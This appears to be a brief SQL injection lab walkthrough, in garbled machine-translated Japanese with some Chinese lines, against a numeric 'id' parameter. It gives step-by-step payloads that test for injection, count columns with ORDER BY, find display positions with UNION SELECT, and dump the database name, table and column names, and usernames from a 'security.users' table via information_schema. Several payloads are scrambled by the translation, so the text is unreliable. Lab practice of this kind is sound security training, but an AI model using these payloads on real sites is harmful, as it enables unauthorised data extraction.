まず、射出タイプが決定されます
(1)まず、パラメータIDを渡す要求、及びデジタルタイプの要件;? ID = 1を参照してください
(2)入力?ID = 1「と1 = 1
エラーが発生しました
(3)入力?ID = 1,1 = 1
ページが正しく表示さ
(4)入力?ID = 1,1 = 2
ページの変更
デジタル式噴射に基づく要約(5)、
2列の数の決意
?1(1)入力されたID = 1つの順序 - +
通常表示
?2(2)入力されたID = 1つの順序 - +
通常表示
?(3)入力されたID = 3により1件のオーダー - +
通常表示
?(4)入力されたID = 4によって1件のオーダー - +
問題
要約すると(5)、判定は3
3 。表示位置を見る、手注入の位置を決定します
(1)?+ -入力ID = -1組合は1,2,3を選択します
図3は、この時点で手の注意の位置であってもよいし、表示位置である3
4.注入
?(1)は、現在のデータベース名注:ID = -1組合1を選択し、データベース()、3 - +
(2)爆注册表ID = -1組合1、GROUP_CONCAT(TABLE_NAME)を選択し、3 TABLE_SCHEMA = "セキュリティ" INFORMATION_SCHEMA.TABLESから- 。?+
+ - table_nameは "ユーザー" = information_schema.columnsからID = -1組合1、GROUP_CONCAT(COLUMN_NAME)を選択し、3(3)注フィールド特定のテーブルへのユーザは、例えば?
(4)注字段的值,这里以users表里的username为例:?id=-1 union select 1,group_concat(username),3 from security.users --+
首先看到要求,要求传一个ID参数,并且要求是数字型的;